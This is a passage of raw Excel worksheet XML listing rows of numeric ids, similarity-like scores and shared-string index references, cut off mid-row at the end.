    <row r="4744" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4744" s="1">
        <v>4742</v>
      </c>
      <c r="B4744">
        <v>3611</v>
      </c>
      <c r="C4744">
        <v>3611</v>
      </c>
      <c r="D4744">
        <v>2</v>
      </c>
      <c r="E4744">
        <v>0.80349999666213989</v>
      </c>
      <c r="F4744" t="s">
        <v>5592</v>
      </c>
      <c r="G4744" t="s">
        <v>9380</v>
      </c>
      <c r="H4744" t="s">
        <v>9381</v>
      </c>
    </row>
    <row r="4745" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4745" s="1">
        <v>4743</v>
      </c>
      <c r="B4745">
        <v>6389</v>
      </c>
      <c r="C4745">
        <v>6389</v>
      </c>
      <c r="D4745">
        <v>2</v>
      </c>
      <c r="E4745">
        <v>0.76670002937316895</v>
      </c>
      <c r="F4745" t="s">
        <v>5592</v>
      </c>
      <c r="G4745" t="s">
        <v>9382</v>
      </c>
      <c r="H4745" t="s">
        <v>9383</v>
      </c>
    </row>
    <row r="4746" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4746" s="1">
        <v>4744</v>
      </c>
      <c r="B4746">
        <v>6388</v>
      </c>
      <c r="C4746">
        <v>6388</v>
      </c>
      <c r="D4746">
        <v>2</v>
      </c>
      <c r="E4746">
        <v>0.62510001659393311</v>
      </c>
      <c r="F4746" t="s">
        <v>5592</v>
      </c>
      <c r="G4746" t="s">
        <v>9384</v>
      </c>
      <c r="H4746" t="s">
        <v>9385</v>
      </c>
    </row>
    <row r="4747" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4747" s="1">
        <v>4745</v>
      </c>
      <c r="B4747">
        <v>3620</v>
      </c>
      <c r="C4747">
        <v>3620</v>
      </c>
      <c r="D4747">
        <v>2</v>
      </c>
      <c r="E4747">
        <v>0.86260002851486206</v>
      </c>
      <c r="F4747" t="s">
        <v>5592</v>
      </c>
      <c r="G4747" t="s">
        <v>9386</v>
      </c>
      <c r="H4747" t="s">
        <v>9387</v>
      </c>
    </row>
    <row r="4748" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4748" s="1">
        <v>4746</v>
      </c>
      <c r="B4748">
        <v>6386</v>
      </c>
      <c r="C4748">
        <v>6386</v>
      </c>
      <c r="D4748">
        <v>2</v>
      </c>
      <c r="E4748">
        <v>0.99659997224807739</v>
      </c>
      <c r="F4748" t="s">
        <v>5592</v>
      </c>
      <c r="G4748" t="s">
        <v>9388</v>
      </c>
      <c r="H4748" t="s">
        <v>9389</v>
      </c>
    </row>
    <row r="4749" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4749" s="1">
        <v>4747</v>
      </c>
      <c r="B4749">
        <v>3626</v>
      </c>
      <c r="C4749">
        <v>3626</v>
      </c>
      <c r="D4749">
        <v>2</v>
      </c>
      <c r="E4749">
        <v>0.97659999132156372</v>
      </c>
      <c r="F4749" t="s">
        <v>5592</v>
      </c>
      <c r="G4749" t="s">
        <v>9390</v>
      </c>
      <c r="H4749" t="s">
        <v>9391</v>
      </c>
    </row>
    <row r="4750" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4750" s="1">
        <v>4748</v>
      </c>
      <c r="B4750">
        <v>3628</v>
      </c>
      <c r="C4750">
        <v>3628</v>
      </c>
      <c r="D4750">
        <v>2</v>
      </c>
      <c r="E4750">
        <v>0.5275999903678894</v>
      </c>
      <c r="F4750" t="s">
        <v>5592</v>
      </c>
      <c r="G4750" t="s">
        <v>9392</v>
      </c>
      <c r="H4750" t="s">
        <v>9393</v>
      </c>
    </row>
    <row r="4751" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4751" s="1">
        <v>4749</v>
      </c>
      <c r="B4751">
        <v>3632</v>
      </c>
      <c r="C4751">
        <v>3632</v>
      </c>
      <c r="D4751">
        <v>2</v>
      </c>
      <c r="E4751">
        <v>0.99519997835159302</v>
      </c>
      <c r="F4751" t="s">
        <v>5592</v>
      </c>
      <c r="G4751" t="s">
        <v>9394</v>
      </c>
      <c r="H4751" t="s">
        <v>9395</v>
      </c>
    </row>
    <row r="4752" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4752" s="1">
        <v>4750</v>
      </c>
      <c r="B4752">
        <v>6382</v>
      </c>
      <c r="C4752">
        <v>6382</v>
      </c>
      <c r="D4752">
        <v>2</v>
      </c>
      <c r="E4752">
        <v>0.88220000267028809</v>
      </c>
      <c r="F4752" t="s">
        <v>5592</v>
      </c>
      <c r="G4752" t="s">
        <v>9396</v>
      </c>
      <c r="H4752" t="s">
        <v>9397</v>
      </c>
    </row>
    <row r="4753" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4753" s="1">
        <v>4751</v>
      </c>
      <c r="B4753">
        <v>6379</v>
      </c>
      <c r="C4753">
        <v>6379</v>
      </c>
      <c r="D4753">
        <v>2</v>
      </c>
      <c r="E4753">
        <v>0.55010002851486206</v>
      </c>
      <c r="F4753" t="s">
        <v>5592</v>
      </c>
      <c r="G4753" t="s">
        <v>9398</v>
      </c>
      <c r="H4753" t="s">
        <v>9399</v>
      </c>
    </row>
    <row r="4754" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4754" s="1">
        <v>4752</v>
      </c>
      <c r="B4754">
        <v>6375</v>
      </c>
      <c r="C4754">
        <v>6375</v>
      </c>
      <c r="D4754">
        <v>2</v>
      </c>
      <c r="E4754">
        <v>0.69330000877380371</v>
      </c>
      <c r="F4754" t="s">
        <v>5592</v>
      </c>
      <c r="G4754" t="s">
        <v>9400</v>
      </c>
      <c r="H4754" t="s">
        <v>9401</v>
      </c>
    </row>
    <row r="4755" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4755" s="1">
        <v>4753</v>
      </c>
      <c r="B4755">
        <v>3640</v>
      </c>
      <c r="C4755">
        <v>3640</v>
      </c>
      <c r="D4755">
        <v>2</v>
      </c>
      <c r="E4755">
        <v>0.66979998350143433</v>
      </c>
      <c r="F4755" t="s">
        <v>5592</v>
      </c>
      <c r="G4755" t="s">
        <v>9402</v>
      </c>
      <c r="H4755" t="s">
        <v>9403</v>
      </c>
    </row>
    <row r="4756" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4756" s="1">
        <v>4754</v>
      </c>
      <c r="B4756">
        <v>3642</v>
      </c>
      <c r="C4756">
        <v>3642</v>
      </c>
      <c r="D4756">
        <v>2</v>
      </c>
      <c r="E4756">
        <v>0.95670002698898315</v>
      </c>
      <c r="F4756" t="s">
        <v>5592</v>
      </c>
      <c r="G4756" t="s">
        <v>9404</v>
      </c>
      <c r="H4756" t="s">
        <v>5849</v>
      </c>
    </row>
    <row r="4757" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4757" s="1">
        <v>4755</v>
      </c>
      <c r="B4757">
        <v>6372</v>
      </c>
      <c r="C4757">
        <v>6372</v>
      </c>
      <c r="D4757">
        <v>2</v>
      </c>
      <c r="E4757">
        <v>0.99479997158050537</v>
      </c>
      <c r="F4757" t="s">
        <v>5592</v>
      </c>
      <c r="G4757" t="s">
        <v>9405</v>
      </c>
      <c r="H4757" t="s">
        <v>9406</v>
      </c>
    </row>
    <row r="4758" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4758" s="1">
        <v>4756</v>
      </c>
      <c r="B4758">
        <v>6370</v>
      </c>
      <c r="C4758">
        <v>6370</v>
      </c>
      <c r="D4758">
        <v>2</v>
      </c>
      <c r="E4758">
        <v>0.98189997673034668</v>
      </c>
      <c r="F4758" t="s">
        <v>5592</v>
      </c>
      <c r="G4758" t="s">
        <v>9407</v>
      </c>
      <c r="H4758" t="s">
        <v>9408</v>
      </c>
    </row>
    <row r="4759" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4759" s="1">
        <v>4757</v>
      </c>
      <c r="B4759">
        <v>3652</v>
      </c>
      <c r="C4759">
        <v>3652</v>
      </c>
      <c r="D4759">
        <v>2</v>
      </c>
      <c r="E4759">
        <v>0.98519998788833618</v>
      </c>
      <c r="F4759" t="s">
        <v>5592</v>
      </c>
      <c r="G4759" t="s">
        <v>9409</v>
      </c>
      <c r="H4759" t="s">
        <v>9410</v>
      </c>
    </row>
    <row r="4760" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4760" s="1">
        <v>4758</v>
      </c>
      <c r="B4760">
        <v>6394</v>
      </c>
      <c r="C4760">
        <v>6394</v>
      </c>
      <c r="D4760">
        <v>2</v>
      </c>
      <c r="E4760">
        <v>0.97579997777938843</v>
      </c>
      <c r="F4760" t="s">
        <v>5592</v>
      </c>
      <c r="G4760" t="s">
        <v>9411</v>
      </c>
      <c r="H4760" t="s">
        <v>9412</v>
      </c>
    </row>
    <row r="4761" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4761" s="1">
        <v>4759</v>
      </c>
      <c r="B4761">
        <v>3596</v>
      </c>
      <c r="C4761">
        <v>3596</v>
      </c>
      <c r="D4761">
        <v>2</v>
      </c>
      <c r="E4761">
        <v>0.98250001668930054</v>
      </c>
      <c r="F4761" t="s">
        <v>5592</v>
      </c>
      <c r="G4761" t="s">
        <v>9413</v>
      </c>
      <c r="H4761" t="s">
        <v>9414</v>
      </c>
    </row>
    <row r="4762" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4762" s="1">
        <v>4760</v>
      </c>
      <c r="B4762">
        <v>3594</v>
      </c>
      <c r="C4762">
        <v>3594</v>
      </c>
      <c r="D4762">
        <v>2</v>
      </c>
      <c r="E4762">
        <v>0.99870002269744873</v>
      </c>
      <c r="F4762" t="s">
        <v>5592</v>
      </c>
      <c r="G4762" t="s">
        <v>9415</v>
      </c>
      <c r="H4762" t="s">
        <v>9416</v>
      </c>
    </row>
    <row r="4763" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4763" s="1">
        <v>4761</v>
      </c>
      <c r="B4763">
        <v>3593</v>
      </c>
      <c r="C4763">
        <v>3593</v>
      </c>
      <c r="D4763">
        <v>2</v>
      </c>
      <c r="E4763">
        <v>0.81230002641677856</v>
      </c>
      <c r="F4763" t="s">
        <v>5592</v>
      </c>
      <c r="G4763" t="s">
        <v>9417</v>
      </c>
      <c r="H4763" t="s">
        <v>9418</v>
      </c>
    </row>
    <row r="4764" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4764" s="1">
        <v>4762</v>
      </c>
      <c r="B4764">
        <v>3512</v>
      </c>
      <c r="C4764">
        <v>3512</v>
      </c>
      <c r="D4764">
        <v>2</v>
      </c>
      <c r="E4764">
        <v>0.58869999647140503</v>
      </c>
      <c r="F4764" t="s">
        <v>5592</v>
      </c>
      <c r="G4764" t="s">
        <v>9419</v>
      </c>
      <c r="H4764" t="s">
        <v>9420</v>
      </c>
    </row>
    <row r="4765" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4765" s="1">
        <v>4763</v>
      </c>
      <c r="B4765">
        <v>3518</v>
      </c>
      <c r="C4765">
        <v>3518</v>
      </c>
      <c r="D4765">
        <v>2</v>
      </c>
      <c r="E4765">
        <v>0.96139997243881226</v>
      </c>
      <c r="F4765" t="s">
        <v>5592</v>
      </c>
      <c r="G4765" t="s">
        <v>9421</v>
      </c>
      <c r="H4765" t="s">
        <v>9422</v>
      </c>
    </row>
    <row r="4766" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4766" s="1">
        <v>4764</v>
      </c>
      <c r="B4766">
        <v>3519</v>
      </c>
      <c r="C4766">
        <v>3519</v>
      </c>
      <c r="D4766">
        <v>2</v>
      </c>
      <c r="E4766">
        <v>0.70020002126693726</v>
      </c>
      <c r="F4766" t="s">
        <v>5592</v>
      </c>
      <c r="G4766" t="s">
        <v>9423</v>
      </c>
      <c r="H4766" t="s">
        <v>9424</v>
      </c>
    </row>
    <row r="4767" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4767" s="1">
        <v>4765</v>
      </c>
      <c r="B4767">
        <v>3526</v>
      </c>
      <c r="C4767">
        <v>3526</v>
      </c>
      <c r="D4767">
        <v>2</v>
      </c>
      <c r="E4767">
        <v>0.70310002565383911</v>
      </c>
      <c r="F4767" t="s">
        <v>5592</v>
      </c>
      <c r="G4767" t="s">
        <v>9425</v>
      </c>
      <c r="H4767" t="s">
        <v>9426</v>
      </c>
    </row>
    <row r="4768" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4768" s="1">
        <v>4766</v>
      </c>
      <c r="B4768">
        <v>3528</v>
      </c>
      <c r="C4768">
        <v>3528</v>
      </c>
      <c r="D4768">
        <v>2</v>
      </c>
      <c r="E4768">
        <v>0.7555999755859375</v>
      </c>
      <c r="F4768" t="s">
        <v>5592</v>
      </c>
      <c r="G4768" t="s">
        <v>9427</v>
      </c>
      <c r="H4768" t="s">
        <v>9428</v>
      </c>
    </row>
    <row r="4769" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4769" s="1">
        <v>4767</v>
      </c>
      <c r="B4769">
        <v>3531</v>
      </c>
      <c r="C4769">
        <v>3531</v>
      </c>
      <c r="D4769">
        <v>2</v>
      </c>
      <c r="E4769">
        <v>0.99659997224807739</v>
      </c>
      <c r="F4769" t="s">
        <v>5592</v>
      </c>
      <c r="G4769" t="s">
        <v>9429</v>
      </c>
      <c r="H4769" t="s">
        <v>9430</v>
      </c>
    </row>
    <row r="4770" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4770" s="1">
        <v>4768</v>
      </c>
      <c r="B4770">
        <v>3532</v>
      </c>
      <c r="C4770">
        <v>3532</v>
      </c>
      <c r="D4770">
        <v>2</v>
      </c>
      <c r="E4770">
        <v>0.9966999888420105</v>
      </c>
      <c r="F4770" t="s">
        <v>5592</v>
      </c>
      <c r="G4770" t="s">
        <v>9431</v>
      </c>
      <c r="H4770" t="s">
        <v>9432</v>
      </c>
    </row>
    <row r="4771" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4771" s="1">
        <v>4769</v>
      </c>
      <c r="B4771">
        <v>3533</v>
      </c>
      <c r="C4771">
        <v>3533</v>
      </c>
      <c r="D4771">
        <v>2</v>
      </c>
      <c r="E4771">
        <v>0.99889999628067017</v>
      </c>
      <c r="F4771" t="s">
        <v>5592</v>
      </c>
      <c r="G4771" t="s">
        <v>9433</v>
      </c>
      <c r="H4771" t="s">
        <v>9434</v>
      </c>
    </row>
    <row r="4772" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4772" s="1">
        <v>4770</v>
      </c>
      <c r="B4772">
        <v>3534</v>
      </c>
      <c r="C4772">
        <v>3534</v>
      </c>
      <c r="D4772">
        <v>2</v>
      </c>
      <c r="E4772">
        <v>0.9976000189781189</v>
      </c>
      <c r="F4772" t="s">
        <v>5592</v>
      </c>
      <c r="G4772" t="s">
        <v>9435</v>
      </c>
      <c r="H4772" t="s">
        <v>9436</v>
      </c>
    </row>
    <row r="4773" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4773" s="1">
        <v>4771</v>
      </c>
      <c r="B4773">
        <v>3535</v>
      </c>
      <c r="C4773">
        <v>3535</v>
      </c>
      <c r="D4773">
        <v>2</v>
      </c>
      <c r="E4773">
        <v>0.99940001964569092</v>
      </c>
      <c r="F4773" t="s">
        <v>5592</v>
      </c>
      <c r="G4773" t="s">
        <v>9437</v>
      </c>
      <c r="H4773" t="s">
        <v>9438</v>
      </c>
    </row>
    <row r="4774" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4774" s="1">
        <v>4772</v>
      </c>
      <c r="B4774">
        <v>6473</v>
      </c>
      <c r="C4774">
        <v>6473</v>
      </c>
      <c r="D4774">
        <v>2</v>
      </c>
      <c r="E4774">
        <v>0.99690002202987671</v>
      </c>
      <c r="F4774" t="s">
        <v>5592</v>
      </c>
      <c r="G4774" t="s">
        <v>9439</v>
      </c>
      <c r="H4774" t="s">
        <v>9440</v>
      </c>
    </row>
    <row r="4775" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4775" s="1">
        <v>4773</v>
      </c>
      <c r="B4775">
        <v>3538</v>
      </c>
      <c r="C4775">
        <v>3538</v>
      </c>
      <c r="D4775">
        <v>2</v>
      </c>
      <c r="E4775">
        <v>0.67760002613067627</v>
      </c>
      <c r="F4775" t="s">
        <v>5592</v>
      </c>
      <c r="G4775" t="s">
        <v>9441</v>
      </c>
      <c r="H4775" t="s">
        <v>9442</v>
      </c>
    </row>
    <row r="4776" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4776" s="1">
        <v>4774</v>
      </c>
      <c r="B4776">
        <v>3542</v>
      </c>
      <c r="C4776">
        <v>3542</v>
      </c>
      <c r="D4776">
        <v>2</v>
      </c>
      <c r="E4776">
        <v>0.68339997529983521</v>
      </c>
      <c r="F4776" t="s">
        <v>5592</v>
      </c>
      <c r="G4776" t="s">
        <v>9443</v>
      </c>
      <c r="H4776" t="s">
        <v>9444</v>
      </c>
    </row>
    <row r="4777" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4777" s="1">
        <v>4775</v>
      </c>
      <c r="B4777">
        <v>6411</v>
      </c>
      <c r="C4777">
        <v>6411</v>
      </c>
      <c r="D4777">
        <v>2</v>
      </c>
      <c r="E4777">
        <v>0.76490002870559692</v>
      </c>
      <c r="F4777" t="s">
        <v>5592</v>
      </c>
      <c r="G4777" t="s">
        <v>9445</v>
      </c>
      <c r="H4777" t="s">
        <v>9446</v>
      </c>
    </row>
    <row r="4778" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4778" s="1">
        <v>4776</v>
      </c>
      <c r="B4778">
        <v>3551</v>
      </c>
      <c r="C4778">
        <v>3551</v>
      </c>
      <c r="D4778">
        <v>2</v>
      </c>
      <c r="E4778">
        <v>0.82349997758865356</v>
      </c>
      <c r="F4778" t="s">
        <v>5592</v>
      </c>
      <c r="G4778" t="s">
        <v>9447</v>
      </c>
      <c r="H4778" t="s">
        <v>9448</v>
      </c>
    </row>
    <row r="4779" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4779" s="1">
        <v>4777</v>
      </c>
      <c r="B4779">
        <v>6409</v>
      </c>
      <c r="C4779">
        <v>6409</v>
      </c>
      <c r="D4779">
        <v>2</v>
      </c>
      <c r="E4779">
        <v>0.99629998207092285</v>
      </c>
      <c r="F4779" t="s">
        <v>5592</v>
      </c>
      <c r="G4779" t="s">
        <v>9449</v>
      </c>
      <c r="H4779" t="s">
        <v>9450</v>
      </c>
    </row>
    <row r="4780" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4780" s="1">
        <v>4778</v>
      </c>
      <c r="B4780">
        <v>3557</v>
      </c>
      <c r="C4780">
        <v>3557</v>
      </c>
      <c r="D4780">
        <v>2</v>
      </c>
      <c r="E4780">
        <v>0.59899997711181641</v>
      </c>
      <c r="F4780" t="s">
        <v>5592</v>
      </c>
      <c r="G4780" t="s">
        <v>9451</v>
      </c>
      <c r="H4780" t="s">
        <v>9452</v>
      </c>
    </row>
    <row r="4781" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4781" s="1">
        <v>4779</v>
      </c>
      <c r="B4781">
        <v>6406</v>
      </c>
      <c r="C4781">
        <v>6406</v>
      </c>
      <c r="D4781">
        <v>2</v>
      </c>
      <c r="E4781">
        <v>0.993399977684021</v>
      </c>
      <c r="F4781" t="s">
        <v>5592</v>
      </c>
      <c r="G4781" t="s">
        <v>9453</v>
      </c>
      <c r="H4781" t="s">
        <v>9454</v>
      </c>
    </row>
    <row r="4782" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4782" s="1">
        <v>4780</v>
      </c>
      <c r="B4782">
        <v>6402</v>
      </c>
      <c r="C4782">
        <v>6402</v>
      </c>
      <c r="D4782">
        <v>2</v>
      </c>
      <c r="E4782">
        <v>0.98970001935958862</v>
      </c>
      <c r="F4782" t="s">
        <v>5592</v>
      </c>
      <c r="G4782" t="s">
        <v>9455</v>
      </c>
      <c r="H4782" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4783" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4783" s="1">
        <v>4781</v>
      </c>
      <c r="B4783">
        <v>6397</v>
      </c>
      <c r="C4783">
        <v>6397</v>
      </c>
      <c r="D4783">
        <v>2</v>
      </c>
      <c r="E4783">
        <v>0.580299973487854</v>
      </c>
      <c r="F4783" t="s">
        <v>5592</v>
      </c>
      <c r="G4783" t="s">
        <v>9457</v>
      </c>
      <c r="H4783" t="s">
        <v>9458</v>
      </c>
    </row>
    <row r="4784" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4784" s="1">
        <v>4782</v>
      </c>
      <c r="B4784">
        <v>6396</v>
      </c>
      <c r="C4784">
        <v>6396</v>
      </c>
      <c r="D4784">
        <v>2</v>
      </c>
      <c r="E4784">
        <v>0.5437999963760376</v>
      </c>
      <c r="F4784" t="s">
        <v>5592</v>
      </c>
      <c r="G4784" t="s">
        <v>9459</v>
      </c>
      <c r="H4784" t="s">
        <v>9460</v>
      </c>
    </row>
    <row r="4785" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4785" s="1">
        <v>4783</v>
      </c>
      <c r="B4785">
        <v>3592</v>
      </c>
      <c r="C4785">
        <v>3592</v>
      </c>
      <c r="D4785">
        <v>2</v>
      </c>
      <c r="E4785">
        <v>0.57969999313354492</v>
      </c>
      <c r="F4785" t="s">
        <v>5592</v>
      </c>
      <c r="G4785" t="s">
        <v>9461</v>
      </c>
      <c r="H4785" t="s">
        <v>9462</v>
      </c>
    </row>
    <row r="4786" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4786" s="1">
        <v>4784</v>
      </c>
      <c r="B4786">
        <v>3540</v>
      </c>
      <c r="C4786">
        <v>3540</v>
      </c>
      <c r="D4786">
        <v>2</v>
      </c>
      <c r="E4786">
        <v>0.73159998655319214</v>
      </c>
      <c r="F4786" t="s">
        <v>5592</v>
      </c>
      <c r="G4786" t="s">
        <v>9463</v>
      </c>
      <c r="H4786" t="s">
        <v>9464</v>
      </c>
    </row>
    <row r="4787" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4787" s="1">
        <v>4785</v>
      </c>
      <c r="B4787">
        <v>3119</v>
      </c>
      <c r="C4787">
        <v>3119</v>
      </c>
      <c r="D4787">
        <v>2</v>
      </c>
      <c r="E4787">
        <v>0.93000000715255737</v>
      </c>
      <c r="F4787" t="s">
        <v>5592</v>
      </c>
      <c r="G4787" t="s">
        <v>9465</v>
      </c>
      <c r="H4787" t="s">
        <v>9466</v>
      </c>
    </row>
    <row r="4788" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4788" s="1">
        <v>4786</v>
      </c>
      <c r="B4788">
        <v>3323</v>
      </c>
      <c r="C4788">
        <v>3323</v>
      </c>
      <c r="D4788">
        <v>2</v>
      </c>
      <c r="E4788">
        <v>0.99699997901916504</v>
      </c>
      <c r="F4788" t="s">
        <v>5592</v>
      </c>
      <c r="G4788" t="s">
        <v>9467</v>
      </c>
      <c r="H4788" t="s">
        <v>9468</v>
      </c>
    </row>
    <row r="4789" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4789" s="1">
        <v>4787</v>
      </c>
      <c r="B4789">
        <v>3318</v>
      </c>
      <c r="C4789">
        <v>3318</v>
      </c>
      <c r="D4789">
        <v>2</v>
      </c>
      <c r="E4789">
        <v>0.99650001525878906</v>
      </c>
      <c r="F4789" t="s">
        <v>5592</v>
      </c>
      <c r="G4789" t="s">
        <v>9469</v>
      </c>
      <c r="H4789" t="s">
        <v>9470</v>
      </c>
    </row>
    <row r="4790" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4790" s="1">
        <v>4788</v>
      </c>
      <c r="B4790">
        <v>6536</v>
      </c>
      <c r="C4790">
        <v>6536</v>
      </c>
      <c r="D4790">
        <v>2</v>
      </c>
      <c r="E4790">
        <v>0.93690001964569092</v>
      </c>
      <c r="F4790" t="s">
        <v>5592</v>
      </c>
      <c r="G4790" t="s">
        <v>9471</v>
      </c>
      <c r="H4790" t="s">
        <v>9472</v>
      </c>
    </row>
    <row r="4791" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4791" s="1">
        <v>4789</v>
      </c>
      <c r="B4791">
        <v>6535</v>
      </c>
      <c r="C4791">
        <v>6535</v>
      </c>
      <c r="D4791">
        <v>2</v>
      </c>
      <c r="E4791">
        <v>0.97269999980926514</v>
      </c>
      <c r="F4791" t="s">
        <v>5592</v>
      </c>
      <c r="G4791" t="s">
        <v>9473</v>
      </c>
      <c r="H4791" t="s">
        <v>9474</v>
      </c>
    </row>
    <row r="4792" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4792" s="1">
        <v>4790</v>
      </c>
      <c r="B4792">
        <v>6534</v>
      </c>
      <c r="C4792">
        <v>6534</v>
      </c>
      <c r="D4792">
        <v>2</v>
      </c>
      <c r="E4792">
        <v>0.60180002450942993</v>
      </c>
      <c r="F4792" t="s">
        <v>5592</v>
      </c>
      <c r="G4792" t="s">
        <v>9475</v>
      </c>
      <c r="H4792" t="s">
        <v>9476</v>
      </c>
    </row>
    <row r="4793" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4793" s="1">
        <v>4791</v>
      </c>
      <c r="B4793">
        <v>6529</v>
      </c>
      <c r="C4793">
        <v>6529</v>
      </c>
      <c r="D4793">
        <v>2</v>
      </c>
      <c r="E4793">
        <v>0.99629998207092285</v>
      </c>
      <c r="F4793" t="s">
        <v>5592</v>
      </c>
      <c r="G4793" t="s">
        <v>9477</v>
      </c>
      <c r="H4793" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4794" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4794" s="1">
        <v>4792</v>
      </c>
      <c r="B4794">
        <v>3176</v>
      </c>
      <c r="C4794">
        <v>3176</v>
      </c>
      <c r="D4794">
        <v>2</v>
      </c>
      <c r="E4794">
        <v>0.54199999570846558</v>
      </c>
      <c r="F4794" t="s">
        <v>5592</v>
      </c>
      <c r="G4794" t="s">
        <v>9479</v>
      </c>
      <c r="H4794" t="s">
        <v>9480</v>
      </c>
    </row>
    <row r="4795" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4795" s="1">
        <v>4793</v>
      </c>
      <c r="B4795">
        <v>6527</v>
      </c>
      <c r="C4795">
        <v>6527</v>
      </c>
      <c r="D4795">
        <v>2</v>
      </c>
      <c r="E4795">
        <v>0.99930000305175781</v>
      </c>
      <c r="F4795" t="s">
        <v>5592</v>
      </c>
      <c r="G4795" t="s">
        <v>9481</v>
      </c>
      <c r="H4795" t="s">
        <v>9482</v>
      </c>
    </row>
    <row r="4796" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4796" s="1">
        <v>4794</v>
      </c>
      <c r="B4796">
        <v>3181</v>
      </c>
      <c r="C4796">
        <v>3181</v>
      </c>
      <c r="D4796">
        <v>2</v>
      </c>
      <c r="E4796">
        <v>0.99690002202987671</v>
      </c>
      <c r="F4796" t="s">
        <v>5592</v>
      </c>
      <c r="G4796" t="s">
        <v>9483</v>
      </c>
      <c r="H4796" t="s">
        <v>9484</v>
      </c>
    </row>
    <row r="4797" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4797" s="1">
        <v>4795</v>
      </c>
      <c r="B4797">
        <v>3182</v>
      </c>
      <c r="C4797">
        <v>3182</v>
      </c>
      <c r="D4797">
        <v>2</v>
      </c>
      <c r="E4797">
        <v>0.78579998016357422</v>
      </c>
      <c r="F4797" t="s">
        <v>5592</v>
      </c>
      <c r="G4797" t="s">
        <v>9485</v>
      </c>
      <c r="H4797" t="s">
        <v>9486</v>
      </c>
    </row>
    <row r="4798" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4798" s="1">
        <v>4796</v>
      </c>
      <c r="B4798">
        <v>3185</v>
      </c>
      <c r="C4798">
        <v>3185</v>
      </c>
      <c r="D4798">
        <v>2</v>
      </c>
      <c r="E4798">
        <v>0.94209998846054077</v>
      </c>
      <c r="F4798" t="s">
        <v>5592</v>
      </c>
      <c r="G4798" t="s">
        <v>9487</v>
      </c>
      <c r="H4798" t="s">
        <v>9488</v>
      </c>
    </row>
    <row r="4799" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4799" s="1">
        <v>4797</v>
      </c>
      <c r="B4799">
        <v>3186</v>
      </c>
      <c r="C4799">
        <v>3186</v>
      </c>
      <c r="D4799">
        <v>2</v>
      </c>
      <c r="E4799">
        <v>0.99739998579025269</v>
      </c>
      <c r="F4799" t="s">
        <v>5592</v>
      </c>
      <c r="G4799" t="s">
        <v>9489</v>
      </c>
      <c r="H4799" t="s">
        <v>9490</v>
      </c>
    </row>
    <row r="4800" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4800" s="1">
        <v>4798</v>
      </c>
      <c r="B4800">
        <v>3187</v>
      </c>
      <c r="C4800">
        <v>3187</v>
      </c>
      <c r="D4800">
        <v>2</v>
      </c>
      <c r="E4800">
        <v>0.99800002574920654</v>
      </c>
      <c r="F4800" t="s">
        <v>5592</v>
      </c>
      <c r="G4800" t="s">
        <v>9491</v>
      </c>
      <c r="H4800" t="s">
        <v>9492</v>
      </c>
    </row>
    <row r="4801" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4801" s="1">
        <v>4799</v>
      </c>
      <c r="B4801">
        <v>3188</v>
      </c>
      <c r="C4801">
        <v>3188</v>
      </c>
      <c r="D4801">
        <v>2</v>
      </c>
      <c r="E4801">
        <v>0.4309999942779541</v>
      </c>
      <c r="F4801" t="s">
        <v>5592</v>
      </c>
      <c r="G4801" t="s">
        <v>9493</v>
      </c>
      <c r="H4801" t="s">
        <v>9494</v>
      </c>
    </row>
    <row r="4802" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4802" s="1">
        <v>4800</v>
      </c>
      <c r="B4802">
        <v>6522</v>
      </c>
      <c r="C4802">
